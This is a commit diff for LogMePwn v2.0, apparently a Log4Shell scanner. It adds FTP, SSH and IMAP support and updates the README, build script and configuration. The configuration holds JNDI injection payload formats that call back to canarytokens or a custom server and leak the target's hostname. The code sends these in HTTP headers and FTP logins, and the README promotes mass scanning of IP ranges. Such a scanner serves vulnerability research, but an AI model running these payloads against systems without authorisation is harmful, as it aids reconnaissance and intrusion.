0xInfection
diff --git a/‎README.md
Lines changed: 45 additions & 14 deletions b/‎README.md
Lines changed: 45 additions & 14 deletions
diff --git a/‎build.sh
Lines changed: 8 additions & 0 deletions b/‎build.sh
Lines changed: 8 additions & 0 deletions
diff --git a/‎conf.go
Lines changed: 31 additions & 23 deletions b/‎conf.go
Lines changed: 31 additions & 23 deletions
diff --git a/‎ftp.go
Lines changed: 62 additions & 0 deletions b/‎ftp.go
Lines changed: 62 additions & 0 deletions
diff --git a/‎go.mod
Lines changed: 8 additions & 1 deletion b/‎go.mod
Lines changed: 8 additions & 1 deletion
diff --git a/‎go.sum
Lines changed: 20 additions & 0 deletions b/‎go.sum
Lines changed: 20 additions & 0 deletions
@@ -10,12 +10,12 @@ LogMePwn works by making use of [Canary Tokens](https://canarytokens.org), which
 To use the tool, you can grab a binary from the [Releases](https://github.com/0xInfection/LogMePwn/releases) section as per your distribution and use it. If you want to build the tool, you'll need Go >= 1.13. Simple clone the repo and run `go build`.
 
 Here's the basic usage of the tool:
-```groovy
+```powershell
 $ ./lmp --help
 
     +---------------------+
     |   L o g M e P w n   |
-    +---------------------+  v1.1
+    +---------------------+  v2.0
 
                 ~ 0xInfection
 Usage:
@@ -59,7 +59,27 @@ Examples:
   ./lmp -email [email protected] -methods GET,POST,PUT,PATCH,DELETE 1.2.3.4:8880
 ```
 
-#### Specifying targets
+### Specifying protocols
+__NEW:__ This feature was introduced in v2.0.
+
+With latest version support for multiple protocols has been introduced. So far we have 4 different protocols:
+- HTTP
+- IMAP
+- SSH
+- FTP
+
+If you do not specify a protocol via the `-proto` argument, the tool will run all the plugins against the default set of ports mentioned.
+
+[_See how to control ports for every protocol._](#specifying-targets)
+
+Example:
+```powershell
+./lmp -protocol ftp -custom-server alerts.testing.local 1.2.3.4:21
+./lmp -protocol ssh -custom-server alerts.testing.local 1.2.3.4:22
+./lmp -token xxxxxxxxxxxxxxxx 1.2.3.4 # scans for all protocols on default ports
+```
+
+### Specifying targets
 The targets can be specified in two ways, via the command line interface as arguments, or via a file.
 
 __NEW:__ Now you can even pass CIDR ranges to scan! This feature was introduced in v1.1.
@@ -70,12 +90,16 @@ Example:
 ./lmp <other args here> -file internet-ranges.lst
 ./lmp <other args here> 192.168.0.0/26 1.2.3.4/30
 ```
-The hosts can may contain ports, if not, the set of ports mentioned in `-ports` will be considered for scanning. The default ports list are:
-- 80
-- 443
-- 8080
 
-#### Specifying payloads
+Every protocol has a default supported list of ports associated which can be fine-tuned using the following flags:
+- `-http-ports` for HTTP.
+- `-imap-ports` for IMAP.
+- `-ssh-ports` for SSH.
+- `-ftp-ports` for FTP.
+
+If the user mentions a host+port pair in form of `host:port`, the default list of ports is discarded and all checks are done for that specific port. If `-protocol` is not mentioned, all protocols' plugins will be tested against the same port.
+
+### Specifying payloads
 _This feature was introduced in v1.1._
 
 You can specify a payload directly via the `-payload` argument directly. However if you want the DNS name of the host which is being tested in the payload, you can specify a formatting directive `$DNSNAME$` which will be replaced with the target against which the payload is being tested.
@@ -97,7 +121,7 @@ You can also specify a payload containing multiple variations of the payload usi
 
 > __NOTE:__ This feature doesn't work with Canary Tokens. Canarytokens doesn't support custom DNS formats.
 
-#### Specifying notification channels
+### Specifying notification channels
 > __NOTE__: If you're supplying a custom payload using `-payload`, specifying a notification channel is __NOT__ necessary. The payload itself should contain your callback server.
 
 The notification channels can be any of the following:
@@ -111,7 +135,7 @@ If you already have a token, you can use the `-token` argument to use the token
 
 > __NOTE:__ If you supply either an email or a webhook, the tool will create a custom canary token. If you use a custom callback server, tokens do not come into play.
 
-#### Sending requests
+### Sending requests
 The tool offers great flexibility when sending requests. By default the tool uses GET requests. A default set of headers are used, each of which contains a payload in its value. You can specify a custom set of headers via the `-headers` argument. You can use the `-headers-file` switch to supply a file containing a list of headers. Examples:
 ```groovy
 ./lmp <other args> -headers 'X-Api-Version' 1.2.3.4:8080
@@ -130,12 +154,12 @@ By default the tool sends a payload directly via the body. The tool offers custo
 
 You can specify a custom user-agent header value via the `-user-agent` switch.
 
-#### Concurrent scanning
+### Concurrent scanning
 The tool is optimized for scanning a wide range of targets. With sufficient amount of network bandwidth and hardware, you can scan the entire IPv4 space within a day. The default number of concurrent threads to use while scanning is set at just 10 (optimised for reliability on local hardware). The value can go upto thousands (I'll leave the benchmarking task upto you). :)
 
 Use the `-threads` switch to supply the number of threads to use with the tool.
 
-#### Specifying delay
+### Specifying delay
 Since a lot of HTTP requests are involved, it might be a cumbersome job for the remote host to handle the requests. The `-delay` parameter is here to help you with those cases. You can specify a delay value in seconds -- which will be used be used in between two subsequent requests to the same port on a server.
 
 ## Demo
@@ -155,7 +179,14 @@ Which immediately triggered a few DNS lookups visible on the token history page
 
 <img src="https://user-images.githubusercontent.com/39941993/146039240-0d34e4d8-284f-4377-bde3-ea13f9f7f5eb.png" width=49% /> <img src="https://user-images.githubusercontent.com/39941993/146039600-ab2a71b1-ec92-4cef-bae4-f3f46dc2ffd6.png" width=49% />
 
-### New Updates
+### Changelog
+- Updates in version v2.0:
+  - Introducing multi-protocol support. Protocols implemented so far:
+    - SSH
+    - IMAP
+    - HTTP
+    - FTP
+
 - Updates in version v1.1:
   - Ability to specify custom payloads via file or command line.
   - Ability to specify custom headers via file.
@@ -165,7 +196,7 @@ Which immediately triggered a few DNS lookups visible on the token history page
 Please add your comment to [this issue](https://github.com/0xInfection/LogMePwn/issues/1).
 
 ## License & Version
-The tool is licensed under the GNU GPLv3. LogMePwn is currently at v1.1.
+The tool is licensed under the GNU GPLv3. LogMePwn is currently at v2.0.
 
 ## Credits
 Shoutout to the team at [Thinkst Canary](https://canary.tools/) for their amazing Canary Tokens project.
 
@@ -0,0 +1,8 @@
+export CGO_ENABLED=0
+GOOS=linux GOARCH=amd64 go build -o lmp-linux64
+GOOS=darwin GOARCH=amd64 go build -o lmp-darwin64
+GOOS=windows GOARCH=amd64 go build -o lmp-windows64.exe
+GOOS=windows GOARCH=386 go build -o lmp-windows32.exe
+GOOS=freebsd GOARCH=amd64 go build -o lmp-freebsd64
+GOOS=openbsd GOARCH=amd64 go build -o lmp-openbsd64
+shasum -a 256 lmp-* > checksums.txt
@@ -10,16 +10,18 @@ import (
 )
 
 var (
-	randomScan                       bool
-	useJson, useXML                  bool
-	maxConcurrent, delay             int
-	hHeaders, hBody, customServer    string
-	email, webhook, dummyXML         string
-	canaryToken, urlFile             string
-	commonPorts, hMethods, userAgent string
-	customPayload, headFile          string
-	allTargets, allPorts             []string
-	allMethods, xload                []string
+	randomScan                              bool
+	useJson, useXML                         bool
+	maxConcurrent, delay                    int
+	hHeaders, hBody, customServer           string
+	email, webhook, dummyXML                string
+	canaryToken, urlFile, proto             string
+	commonHTTPPorts, hMethods, userAgent    string
+	commonIMAPPorts, commonSSHPorts         string
+	customPayload, headFile, commonFTPPorts string
+	allTargets, allHTTPPorts, allSSHPorts   []string
+	allMethods, xload, allIMAPPorts         []string
+	allFTPPorts                             []string
 
 	procCount  = 1
 	canaryResp = new(CanaryResp)
@@ -38,15 +40,20 @@ var (
 		},
 	}
 	defaultHTTPHeaders = []string{
-		"A-IM", "Accept-Charset", "Accept-Datetime", "Accept-Encoding", "X-Api-Version",
-		"Accept-Language", "Access-Control-Request-Method", "Access-Control-Request-Headers",
-		"Authorization", "Cache-Control", "Cookie", "Expect", "Forwarded", "From", "X-IP",
-		"HTTP2-Settings", "If-Match", "If-Modified-Since", "If-None-Match", "If-Range", "X-Request-Id",
-		"If-Unmodified-Since", "True-Client-IP", "Origin", "Pragma", "Prefer", "Proxy-Authorization",
-		"Range", "Referer", "Forwarded-Proto", "TE", "Trailer", "Transfer-Encoding", "User-Agent",
-		"Upgrade", "Via", "Warning", "Upgrade-Insecure-Requests", "X-Requested-With", "DNT",
-		"X-Forwarded-For", "X-Correlation-ID", "X-Forwarded-Host", "X-Forwarded-Proto", "Front-End-Https",
-		"X-ATT-DeviceId", "X-Wap-Profile", "Proxy-Connection", "X-UIDH", "X-Csrf-Token", "X-Request-ID",
+		"Accept-Charset", "Accept-Datetime", "Accept-Encoding",
+		"Accept-Language", "Cache-Control", "Cookie", "DNT",
+		"Forwarded", "Forwarded-For", "Forwarded-For-Ip",
+		"Forwarded-Proto", "From", "Max-Forwards", "Origin",
+		"Pragma", "Referer", "True-Client-IP", "Upgrade",
+		"User-Agent", "Via", "Warning", "X-Api-Version",
+		"X-Att-DeviceId", "X-Correlation-ID", "X-Csrf-Token",
+		"X-Do-Not-Track", "X-Forwarded", "X-Forwarded-By", "X-XSRF-TOKEN",
+		"X-Forwarded-For", "X-Forwarded-Host", "X-Forwarded-Port",
+		"X-Forwarded-Proto", "X-Forwarded-Scheme", "X-Forwarded-Server",
+		"X-Forwarded-Ssl", "X-Forward-For", "X-From", "X-Geoip-Country",
+		"X-Http-Destinationurl", "X-Http-Host-Override", "X-Http-Method",
+		"X-Http-Method-Override", "X-Hub-Signature", "X-If-Unmodified-Since",
+		"X-ProxyUser-Ip", "X-Requested-With", "X-Request-ID", "X-UIDH",
 	}
 	lackofart = fmt.Sprintf(`
     +---------------------+
@@ -59,8 +66,9 @@ var (
 
 type (
 	ProcJob struct {
-		Host   string
-		Method string
+		Host     string
+		Method   string
+		Protocol string
 	}
 	CanaryResp struct {
 		Token         string      `json:"Token"`
@@ -75,9 +83,9 @@ type (
 )
 
 const (
-	version           = "v1.1"
+	version           = "v2.0"
 	letterBytes       = "abcdefghijklmnopqrstuvwxyz0123456789"
 	maxWorkers        = 100
 	canaryTokenFormat = "${jndi:ldap://x${hostName}.L4J.%s.canarytokens.com/a}"
-	genericPayFormat  = "${jndi:ldap://$DNSNAME$--${hostname}.%s/asas}"
+	genericPayFormat  = "${jndi:ldap://$DNSNAME$--${hostname}.%s/a}"
 )
@@ -0,0 +1,62 @@
+package main
+
+import (
+	"fmt"
+	"math/rand"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/jlaffaye/ftp"
+)
+
+func (p *ProcJob) ProcessHostFTP(port string, wg *sync.WaitGroup) error {
+	var host string
+	if len(port) < 1 {
+		host = p.Host
+	} else {
+		host = fmt.Sprintf("%s:%s", p.Host, port)
+	}
+
+	defer wg.Done()
+	thisTime := time.Now()
+	fmt.Printf("\r%d/%02d/%02d %02d:%02d:%02d Total processed: %d  |  Current: %s  |  Protocol: %s",
+		thisTime.Year(), thisTime.Month(), thisTime.Day(), thisTime.Hour(),
+		thisTime.Minute(), thisTime.Second(), procCount, host, p.Protocol)
+
+	procCount++
+
+	var dynamicPayloads []string
+	sanitisedDnsName := strings.ReplaceAll(host, ".", "-")
+	sanitisedDnsName = strings.ReplaceAll(sanitisedDnsName, ":", "-")
+	sanitisedDnsName = strings.ReplaceAll(sanitisedDnsName, "/", "-")
+	for _, payload := range xload {
+		dynamicPayloads = append(dynamicPayloads, strings.ReplaceAll(payload, "$DNSNAME$", sanitisedDnsName))
+	}
+
+	xc := make(chan bool, 1)
+	go func() {
+		c, err := ftp.Dial(host, ftp.DialWithTimeout(3*time.Second))
+		if err != nil {
+			return
+		}
+		username := dynamicPayloads[rand.Intn(len(dynamicPayloads))]
+		password := dynamicPayloads[rand.Intn(len(dynamicPayloads))]
+
+		err = c.Login(username, password)
+		if err != nil {
+			return
+		}
+		if err = c.Quit(); err != nil {
+			return
+		}
+		xc <- true
+	}()
+	select {
+	case <-xc:
+		time.Sleep(time.Duration(delay) * time.Second)
+		return nil
+	case <-time.After(3 * time.Second):
+		return fmt.Errorf("timeout during ftp dial / login")
+	}
+}
@@ -2,9 +2,16 @@ module lmp
 
 go 1.17
 
+require github.com/valyala/fasthttp v1.31.0
+
 require (
 	github.com/andybalholm/brotli v1.0.4 // indirect
+	github.com/emersion/go-imap v1.2.0 // indirect
+	github.com/emersion/go-sasl v0.0.0-20200509203442-7bfe0ed36a21 // indirect
+	github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b // indirect
 	github.com/klauspost/compress v1.13.6 // indirect
 	github.com/valyala/bytebufferpool v1.0.0 // indirect
-	github.com/valyala/fasthttp v1.31.0
+	golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3 // indirect
+	golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 // indirect
+	golang.org/x/text v0.3.7 // indirect
 )
@@ -1,22 +1,42 @@
 github.com/andybalholm/brotli v1.0.2/go.mod h1:loMXtMfwqflxFJPmdbJO0a3KNoPuLBgiu3qAvBg8x/Y=
 github.com/andybalholm/brotli v1.0.4 h1:V7DdXeJtZscaqfNuAdSRuRFzuiKlHSC/Zh3zl9qY3JY=
 github.com/andybalholm/brotli v1.0.4/go.mod h1:fO7iG3H7G2nSZ7m0zPUDn85XEX2GTukHGRSepvi9Eig=
+github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
+github.com/emersion/go-imap v1.2.0 h1:lyUQ3+EVM21/qbWE/4Ya5UG9r5+usDxlg4yfp3TgHFA=
+github.com/emersion/go-imap v1.2.0/go.mod h1:Qlx1FSx2FTxjnjWpIlVNEuX+ylerZQNFE5NsmKFSejY=
+github.com/emersion/go-message v0.15.0/go.mod h1:wQUEfE+38+7EW8p8aZ96ptg6bAb1iwdgej19uXASlE4=
+github.com/emersion/go-sasl v0.0.0-20200509203442-7bfe0ed36a21 h1:OJyUGMJTzHTd1XQp98QTaHernxMYzRaOasRir9hUlFQ=
+github.com/emersion/go-sasl v0.0.0-20200509203442-7bfe0ed36a21/go.mod h1:iL2twTeMvZnrg54ZoPDNfJaJaqy0xIQFuBdrLsmspwQ=
+github.com/emersion/go-textwrapper v0.0.0-20200911093747-65d896831594/go.mod h1:aqO8z8wPrjkscevZJFVE1wXJrLpC5LtJG7fqLOsPb2U=
 github.com/golang/snappy v0.0.3/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
+github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b h1:Ur6QAxsHCK99Quj9PaWafoV4unb0DO/HWiKExD+TN5g=
+github.com/jlaffaye/ftp v0.0.0-20211117213618-11820403398b/go.mod h1:2lmrmq866uF2tnje75wQHzmPXhmSWUt7Gyx2vgK1RCU=
 github.com/klauspost/compress v1.13.4/go.mod h1:8dP1Hq4DHOhN9w426knH3Rhby4rFm6D8eO+e+Dq5Gzg=
 github.com/klauspost/compress v1.13.6 h1:P76CopJELS0TiO2mebmnzgWaajssP/EszplttgQxcgc=
 github.com/klauspost/compress v1.13.6/go.mod h1:/3/Vjq9QcHkK5uEr5lBEmyoZ1iFhe47etQ6QUkpK6sk=
+github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4=
+github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
+github.com/stretchr/testify v1.6.1/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
 github.com/valyala/bytebufferpool v1.0.0 h1:GqA5TC/0021Y/b9FG4Oi9Mr3q7XYx6KllzawFIhcdPw=
 github.com/valyala/bytebufferpool v1.0.0/go.mod h1:6bBcMArwyJ5K/AmCkWv1jt77kVWyCJ6HpOuEn7z0Csc=
 github.com/valyala/fasthttp v1.31.0 h1:lrauRLII19afgCs2fnWRJ4M5IkV0lo2FqA61uGkNBfE=
 github.com/valyala/fasthttp v1.31.0/go.mod h1:2rsYD01CKFrjjsvFxx75KlEUNpWNBY9JWD3K/7o2Cus=
 github.com/valyala/tcplisten v1.0.0/go.mod h1:T0xQ8SeCZGxckz9qRXTfG43PvQ/mcWh7FwZEA7Ioqkc=
 golang.org/x/crypto v0.0.0-20210513164829-c07d793c2f9a/go.mod h1:P+XmwS30IXTQdn5tA2iutPOUgjI07+tq3H3K9MVA1s8=
+golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3 h1:0es+/5331RGQPcXlMfP+WrnIIS6dNnNRe0WB02W0F4M=
+golang.org/x/crypto v0.0.0-20211215153901-e495a2d5b3d3/go.mod h1:IxCIyHEi3zRg3s0A5j5BB6A9Jmi73HwBIUl50j+osU4=
 golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg=
 golang.org/x/net v0.0.0-20210510120150-4163338589ed/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
 golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210423082822-04245dca01da/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
 golang.org/x/sys v0.0.0-20210514084401-e8d321eab015/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
+golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1 h1:SrN+KX8Art/Sf4HNj6Zcz06G7VEz+7w9tdXTPOZ7+l4=
+golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
 golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
 golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
 golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
+golang.org/x/text v0.3.7 h1:olpwvP2KacW1ZWvsR7uQhoyTYvKAupfQrRGBFM352Gk=
+golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ=
 golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
+gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0=
+gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM=